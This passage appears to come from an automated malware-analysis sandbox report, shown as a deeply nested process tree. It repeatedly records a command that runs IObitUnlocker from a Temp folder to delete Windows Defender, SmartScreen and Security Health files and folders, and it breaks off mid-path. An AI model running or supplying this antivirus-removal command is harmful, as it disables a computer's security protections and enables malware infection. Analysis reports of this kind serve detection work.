                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 